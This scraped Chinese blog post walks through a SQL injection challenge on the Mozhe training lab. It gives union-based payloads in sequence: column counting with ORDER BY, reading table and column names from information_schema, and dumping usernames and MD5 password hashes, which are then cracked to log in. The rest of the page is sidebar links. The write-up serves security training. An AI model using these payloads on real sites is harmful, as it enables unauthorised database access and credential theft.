当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- Abnormal + Abstract
- Oops, the system is under attack again
- Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
- Macquarie Bank drives digital transformation with datastex enterprise (DSE)
- vivoy73s和荣耀30青春版的区别
- Search and replace of sed
- print( 'Hello,NumPy!' )
- Is blazor ready to serve the enterprise?
- PCR and PTS calculation and inverse operation in TS stream
- IOS upload app store error: this action cannot be completed - 22421 solution
猜你喜欢
Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
China Telecom announces 5g SA commercial scale in 2020
在Ubuntu上体验最新版本EROFS
Daily challenges of search engines_ 4_ External heterogeneous resources - Zhihu
Mouse small hand
Template linked list learning
scala 中 Future 的简单使用
Visual Studio 2015 未响应/已停止工作的问题解决
Qt混合Python开发技术:Python介绍、混合过程和Demo
随机推荐
python 循环区分(while循环和for循环)
搜索引擎的日常挑战_4_外部异构资源 - 知乎
Dogs can also operate drones! You're right, but it's actually an autonomous drone - you know
Rust: command line parameter and environment variable operation
Qt混合Python开发技术:Python介绍、混合过程和Demo
“智能5G”引领世界,数位智能网优+5G能带来什么?
【总结系列】互联网服务端技术体系:高性能之数据库索引
Basic concepts of computer network (5) basic principles of local area network
QT hybrid Python development technology: Python introduction, hybrid process and demo
How can a technician take over a complex system?
OSChina 周日乱弹 —— 之前呢,我一直以为自己是个……
鼠标变小手
PCIe enumeration process
vivoS7e和vivoS7的区别 哪个更值得入手
Littlest jupyterhub| 02 using nbgitpuller to distribute shared files
[summary series] technical system of Internet server: high performance database index
解决RabbitMQ消息丢失与重复消费问题
PX4添加新的应用
Astra: the future of Apache Cassandra is cloud native
哔哩哔哩常用api